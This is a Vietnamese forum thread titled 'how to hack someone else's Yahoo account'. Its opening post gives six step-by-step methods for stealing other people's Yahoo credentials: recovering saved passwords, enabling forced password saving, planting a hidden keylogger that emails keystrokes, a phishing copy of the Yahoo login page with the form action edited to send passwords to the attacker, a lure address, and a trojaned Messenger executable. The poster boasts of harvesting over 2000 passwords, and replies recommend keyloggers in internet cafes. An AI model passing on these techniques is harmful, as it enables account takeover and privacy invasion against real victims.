Có thể bạn quan tâm


Đang tải thanh công cụ tìm kiếm ...

Trang 1/2 12 cuốicuối
Hiện kết quả từ 1 tới 10 của 15

cách hack nick yahoo của người khác

Chủ đề được gửi trong chuyên mục Thư viện Software bởi Mickey


 1. 13-06-2009, 09:50 PM

  cách hack nick yahoo của người khác

  Cách1: Bạn đi chat và đã bao giờ để ý đến dòng Remember my ID & Password trong trang Login của YM chưa? Có rất nhiều người khi đi chat hay check dòng đó, YM sẽ lưu lại ID & Password của họ chỉ cần sử dụng phần mềm Caption It là bạn có thể dịch được cái dòng password **** đó. Vậy download phần mềm đó ở đâu? Bạn có thể down nó ngay trong trang sau http://dear.to trong mục Download. Thế còn sử dụng nó hê...hê dễ như ăn cháo vậy .Sau khi down nó về bạn sẽ thấy nó chỉ có duy nhất một file bạn chạy file đó rồi di chuột đến dòng password cần dịch password sẽ hiện ra trong box.
  *Cách2: Cách này thì có lẽ ít bạn để ý đến, đó là bạn sẽ làm cho windown tự động lưu lại ID & password mà chẳng thèm để ý xem nạn nhân có đồng ý hay không. Người khác có thể vào xem thư mà chẳng cần biết ID lẫn password, Windown sẽ lưu password vào file *.PWL trong Windown/System và chỉ cần dùng phần mềm ToolPWL là sẽ biết được passsword. Để làm điều đó bạn hãy vào Internet Explorer chọn Tools--> Internet Options...-->Chọn tag Content---> Auto Complete...--->đánh dấu chọn User name & password on form và Prompt me to save passwords. Vậy là windown sẽ lưu lại password mà chẳng thèm hỏi han gì cả.

  *Cách3: Cách này sử dụng phần mềm KeyLogger5.0, chức năng của nó là ghi lại tất cả những gì nạn nhân đánh ở bàn phím ID, password...tất tần tật. Nó lại còn có thể chụp lại màn hình sau khoảng thời gian mà bạn định sẵn nữa chứ- nó có chế độ tự huỷ theo ngày mà bạn chọn. Tất cả mọi thứ sẽ được lưu lại và gửi về email cho bạn chỉ cần email của bạn có hỗ trợ pop chẳng hạn như hotmail- còn yahoo thì hết free lâu rồi. Bạn chỉ cần download nó về chạy nó ở bất cứ đâu bạn có thể dâu nó ở một chỗ mà nạn nhân khó phát hiện nhất- sau đó bạn setting cho nó, cái này cũng chẳng khó khăn gì nếu bạn đã từng xài bomb mail thì setting cho cái này cũng tương tự thôi. Bạn cũng có thể cài mật khẩu để chỉ một mình bạn sử dụng được mà thôi. Mà cái quan trọng là mấy "anh chàng vệ sĩ" Anti_Virus hay Trojan Remove chẳng thể phát hiện nổi nó. Thế download nó ở đâu? Vâng hãy vào trang chủ http://dear.to/mytrung vào mục Download để down nó về. Vậy thì làm thế nào để biết máy mình có dính nó không? Bạn hãy đặt chế độ "firewall" cho NAV để khi có file gửi đi nó sẽ thông báo cho bạn biết, nếu bạn thấy nghi ngờ hãy vào Star-->Seach để tìm xem có mặt nó hay không nếu có thì delete nó đi là xong.
  *Cách4: Cách này chúng ta sẽ tạo một trang giao diện giống Yahoo Mail để khi nạn nhân check mail thì password sẽ gửi về hộp thư cuả bạn. Làm sao để tạo đây hê...hê hãy yên tâm bạn chẳng cần biết chút gì về thiết kế web cũng có thể làm được. Đầu tiên bạn hãy vàohttp://mail.yahoo.com sau đó chọn menu File-->Save AS để ghi trang đó lại, hãy nhớ xem bạn ghi lại ở đâu nhé! Bây giờ hãy mở Notepad ra ( Star/Programs File/Accessories/Notepad). Chọn File/Open để mở trang Yahoo Mail bạn vừa ghi ra, bạn tìm đến dòng sau : <FORM name=login_form onsubmit="return hash(this,'http://login.yahoo.com/config/login')" action=https://login.yahoo.com/config/login?c17b5e bqs944v method=post autocomplete="off"> Bạn hãy sửa nó lại như sau: <FORM method="post" action="maito:địa chỉ email của bạn"> Ví dụ: email của tui là jerry_khung@yahoo.com thì dòng đó sẽ là action="jerry_khung@yahoo.com" Xong xuôi bạn chọn Save để ghi lại.Tìm đến nơi bạn ghi file Yahoo Mail đó click chuột phải vào chọn Send to-->Desktop.File đó sẽ được đưa ra màn hình, bạn hãy rename nó cho hấp dẫn chút kiểu kiểu như: "Yahoo Mail" hay "Check Mail" chẳng hạn... giờ thì ngồi chờ để xem có "gà" nào check mail không là OK! He..he..
  *Cach 5 : Trước khi nói đến cách này thì xin được gửi lời xin lỗi đến các bạn đã làm theo Cách 2 trong bài "lấy password email yahoo" ở trang chủ. Mình không có ý định lừa để lấy pass của ai cả mà chỉ muốn cho các bạn biết đó cũng là một cách hack. Hiệu quả của nó ư? Hê..hê bằng cách đó mình lấy được hơn 2000 password email. Cũng chỉ vì nhóc Hope$un post cách đó bên hackervn mà thư cứ gửi về lườm lượp, lại còn lên cả báo Sinh viên Viêt Nam nữa chứ. Ho..ho Nào bạn hãy đăng ký 1 địa chỉ email Yahoo đại loại như Showmepassword@yahoo, return_pass@yahoo, hay lookup_pass@yahoo... chẳng hạn, sau đó dụ victim giống như mình đã làm các bạn có thể dựa vào đó... !
  *Cấch 6 Cách này chúng ta sẽ tạo một face giống Yahoo Messenger để khi victim đi chat, nhập ID & Password thì nó sẽ lưu lại. Đầu tiên bạn cần down YahooFace trong mục download ở trang chủ, giải nén nó bạn sẽ có 2 file: yahoo.mdb và YPager.exe. Bạn hãy copy file yahoo vào ổ C:\, tiếp đến bạn copy file YPager đến thư mục cài đặt Yahoo Messenger thường thì nó nằm ở C:\Programs Files\Yahoo\Messenger, trước khi paste file YPager bạn lên rename file YPager có trước trong đó thành YPager1 chẳng hạn sau đó đưa nó ra màn hình để khi login vào face Yahoo của mình không được thì victim có thể chọn cái shortcut đó để vào Yahoo Messenger một cách bình thường , rồi paste file YPager mà bạn vừa down về, vậy là xong rồi đó khi nạn nhân login thì ID & Password vào file yahoo.mdb, để xem bạn hãy chạy file YPager click vào nút Search rồi đánh vào password login123 để xem danh sách các nạn nhân, để lấy được file yahoo.mdb bạn có thể sử dụng phần mềm Stealmail để nó gửi về mail cho bạn.
  Bạn nào thực hành thành công , nhớ nhắn tin qua nick tinh_nguyen2007@yahoo.com. Mong cái này giúp được cho các bạn
 2. 4 Thành viên dưới đây đã cảm ơn cho bài viết rất có ích của Mickey :

  ckluvht (17-07-2009),pham_khang (04-04-2010),thahbag (21-05-2012),tranthithanhsang (24-11-2010)

 3. 29-09-2009, 02:12 PM

  cách hack nick yahoo của người khác

  em làm hoài ma ko được anh ơi
 4. 24-03-2012, 09:38 PM

  cách hack nick yahoo của người khác

  phá hoại thì đơn giản lắm, đưa 1 cái nick đây mình sẽ phá cho, còn về việc hack pass thì chỉ có Perfect Keylloger và Magic - ps ( đổi vs yahoo 10 đổ xuống )
 5. 24-03-2012, 09:54 PM

  cách hack nick yahoo của người khác

  Tưởng lấy đc pass kia. Mình mất kái yahoo muốn lấy lại pass mà k đc.
 6. 24-03-2012, 09:58 PM

  cách hack nick yahoo của người khác

  mấy nick bạn em biết hết. Cho nó muợn điện thoại đăng nhập. Chỉ cần bộ gõ máy chọn tất cả thấy pass ngay
 7. 24-03-2012, 10:00 PM

  cách hack nick yahoo của người khác

  tạo 1 trang login giống yahoo, đưa cho nó
  kích vô đi là chết , làm giống mấy siêu nhân
  cố lên 3 cách đó áp dụng cho máy tính cá nhân + tiệm nét [ cách 3 ]
 8. 24-03-2012, 10:00 PM

  cách hack nick yahoo của người khác

  nói chung là cũng good
  Bán tên miền quốc tế giá rẽ 20.000VNĐ/1 năm ( Full CP )

  .com .net .biz .info .org .in .name .mobi

  Liên hệ : tenmien20@yahoo.com.vn - website : www.tenmien20.com
 9. 21-05-2012, 01:54 AM

  cách hack nick yahoo của người khác

  Trích Nguyên văn bởi Ken1102 Xem bài viết
  phá hoại thì đơn giản lắm, đưa 1 cái nick đây mình sẽ phá cho, còn về việc hack pass thì chỉ có Perfect Keylloger và Magic - ps ( đổi vs yahoo 10 đổ xuống )
  phá thì ntn, phá kiểu j thế b?
 10. 21-05-2012, 03:34 AM

  cách hack nick yahoo của người khác

  đã xài con Perfect Keylloger cứ dc 2 kb là nó send mail một lần,ngày hơn 2000 mail,lọc thấy sợ luôn.xài với soft phá băng (df),ra quán nét cắm vô,rùi về nhà bật oulock lên đọc mail thôi,
  dien dan share code http://nganhangcode.com yh:hoangnhatnam2011
 11. 21-05-2012, 04:56 AM

  cách hack nick yahoo của người khác

  Trích Nguyên văn bởi hoangnhatnam Xem bài viết
  đã xài con Perfect Keylloger cứ dc 2 kb là nó send mail một lần,ngày hơn 2000 mail,lọc thấy sợ luôn.xài với soft phá băng (df),ra quán nét cắm vô,rùi về nhà bật oulock lên đọc mail thôi,
  Bệnh à toàn sài 5' gui 1 lam co thang nao dien ma 2kb khong... ma nếu cài ở tiệm net thì cài khoản 2-3 tiếng check đở cực
 12. Thành viên dưới đây đã cám ơn bài viết này của Bo.3Byz :

  1namnua (18-10-2013)

Trang 1/2 12 cuốicuối

Facebook comment

Thông tin đề tài

Users Browsing this Thread

Hiện đang có 1 người đang xem bài viết này. (0 thành viên và 1 khách)

Visitors found this page by searching for:

hack nick

cách lấy pass yahoo của người khác

cách lấy mật khẩu yahoo của người khác

cách hack nick yahoo đơn giản

hack nick yahoo của người khác

hack mat khau yahoo cua nguoi khac

cách hack nick yahoocách hack nick yahoo của người kháccách vào yahoo của người kháccách tìm mật khẩu yahoo của người kháchach nichhack lay nick yahoohack nichlay yahoo cua nguoi khaccách hack nick yahoo đơn giản nhấtxem nhat ky yahoo cua nguoi khacphan mem hack nick yahoo moi nhatlam the nao de biet mat khau yahoo cua nguoi khachack nick yahoohack nikhack nick yahoo đơn giảncách hack pass yahoo của người kháccách lấy password của người kháclam sao hack nick yahoophan mem hack yahoo messenger